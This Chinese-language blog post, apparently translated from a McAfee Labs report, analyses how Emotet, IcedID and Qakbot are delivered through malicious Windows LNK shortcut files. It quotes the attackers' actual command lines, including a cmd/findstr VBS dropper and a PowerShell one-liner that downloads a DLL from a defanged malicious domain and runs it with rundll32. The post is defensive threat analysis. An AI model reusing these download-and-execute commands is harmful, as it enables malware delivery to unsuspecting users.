日益流行的快捷方式恶意软件

littlebird

日益流行的快捷方式恶意软件关键词

1. LNK文件、恶意软件、Emotet、Qakbot、IcedID

复制代码

​
LNK文件在Windows系统中用于创建链接到文件、文件夹或应用程序的快捷方式。LNK文件基于Shell Link二进制文件格式，包含了用于访问另一个数据对象的信息。这些文件可以使用右键菜单中的创建快捷方式选项手动创建，也可以在应用程序运行时自动创建。许多工具可以用来创建LNK文件，其中就有专门为恶意目的构建的“lnkbombs”工具。
在2022年第二季度，McAfee Labs发现使用LNK文件投放的恶意软件有所增加。利用了LNK的攻击者能够轻易地投放Emotet、Qakbot、IcedID、Bazarloaders等恶意软件。

​

编辑
图1 从4月到5月LNK攻击的地理位置
本文将分析攻击者使用LNK文件投放恶意软件的过程，下面是这些LNK文件在普通用户眼中的截图。

​

编辑
图2 普通用户看到的LNK文件
1.
LNK威胁分析和活动


随着微软默认禁用Office宏，恶意软件作者现在正在改进他们的诱饵技术，包括利用LNK文件来实现他们的目标。
攻击者使用垃圾邮件和恶意URL将LNK文件投放给受害者。这些文件通过PowerShell、CMD 和MSHTA等合法应用程序下载恶意文件。
本文将通过分析最近的三个恶意软件活动Emotet、IcedID和Qakbot来展示这些文件的危险程度。
2.
EMOTET


(1)感染链

​

编辑
图3 Emotet通过LNK文件感染链投放
(2)威胁分析

​

编辑
图4 用户收到带有恶意LNK附件的电子邮件
在图4中可以看到诱饵消息和恶意的LNK附件。
用户由于主动访问了LNK附件而被感染。为了更深入地分析，下面将展示LNK文件的属性：

​

编辑
图5 Emotet LNK示例的属性
如图5所示，目标（Target）一栏显示LNK调用了Windows命令处理器(cmd.exe)。属性中的目标路径仅展示255个字符，然而命令行参数最多可达4096个字符。因此，攻击者可以利用这一优势隐蔽地传递长参数。
在这一例子中，参数为/vn /c findstr “glKmfOKnQLYKnNs.*” “Form 04.25.2022, US.lnk” > “%tmp%\YlScZcZKeP.vbs” & “%tmp%\YlScZcZKeP.vbs”

​

编辑
图6 Emotet LNK文件的内容
一旦findstr.exe工具接收到相应的字符串，LNK文件的其余内容将保存在%temp%文件夹下的.VBS文件中，随机名称为YIScZcZKeP.vbs。
cmd.exe命令的下一部分使用Windows脚本宿主(wscript.exe)调用VBS文件，以下载64位的Emotet DLL有效载荷。
最后，已下载的DLL使用REGSVR32.EXE工具执行，其行为与基于excel(.xls)版本的emotet相似。
3. ICEDID


(1)感染链

​

编辑
图7 IcedID通过LNK文件感染链投放
(2)威胁分析
此攻击是攻击者将LNK、PowerShell和MSHTA工具链接起来，以攻击其受害者的完美示例。
在PowerShell LNK中有一个经过高度混淆的参数，可以在图8中看到LNK属性的目标部分：

​

编辑
图8 IcedID LNK样本的属性
该参数非常长，在目标部分中无法完全显示。整个混淆参数在运行时被解密，然后使用参数hxxps://hectorcalle[.]com/093789.hta执行 MSHTA。
下载的HTA文件调用另一个具有类似混淆参数的PowerShell，连接到Uri为hxxps://hectorcalle[.]com/listbul.exe的地址。
该Uri会在%HOME%文件夹中下载EXE格式的64位IcedID安装程序。
4. QAKBOT


(1)感染链

​

编辑
图9 QAKBOT通过LNK文件感染链投放
(2)威胁分析
这次攻击将展示攻击者如何直接硬编码恶意URL，以此来与PowerShell等工具一起运行，并下载主要的有效载荷。

​

编辑
图10 Qakbot LNK样本的属性
在图 10 中，目标部分完整的参数为
”C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoExit iwr -Uri hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png -OutFile $env:TEMP\test.dll;Start-Process rundll32.exe $env:TEMP\test.dll,jhbvygftr”
此PowerShell LNK使用Invoke-WebRequest命令连接到hxxps://news-wellness[.]com/5MVhfo8BnDub/D.png，并将下载的内容保存在%temp%文件夹下的test.dll文件中。
这就是主要的Qakbot DLL有效载荷，然后使用rundll32工具执行。
5. 结论


如我们在上述三个威胁活动中看到的那样，攻击者对Windows快捷方式LNK文件的滥用会威胁到普通用户。恶意LNK通常使用PowerShell和CMD连接到恶意URL以下载恶意载荷，LNK与PowerShell、CMD、MSHTA等结合使用，会对受害者的机器造成严重损害。
本文在这里只介绍了三个威胁系列，但已经能够看出这些文件正使用其他Windows工具来投放各种类型的恶意载荷。这些类型的攻击仍在不断发展，因此每个用户在使用LNK快捷方式文件时都必须进行彻底的检查，保持他们的操作系统和防病毒软件是最新的版本，时刻提防网络钓鱼邮件和恶意的链接及附件。
参考链接：https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/
​​​​